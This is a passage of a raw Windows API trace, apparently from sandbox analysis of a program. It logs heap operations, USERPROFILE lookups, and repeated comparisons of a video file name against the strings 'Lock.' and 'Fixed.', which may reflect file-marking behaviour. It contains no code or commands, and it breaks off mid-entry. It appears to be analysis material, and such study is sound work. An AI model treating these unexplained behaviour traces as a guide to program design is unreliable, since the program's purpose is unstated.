CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0214.887] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0214.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa61b0 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X3KII9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3KII9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KII9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="II9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ky2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zq5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eE1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1M.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0214.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0214.889] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0214.890] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.890] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0214.891] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0214.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.892] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0214.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0214.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0214.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0214.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0214.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.895] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.895] HeapFree (in: hHeap=0x2af0000, 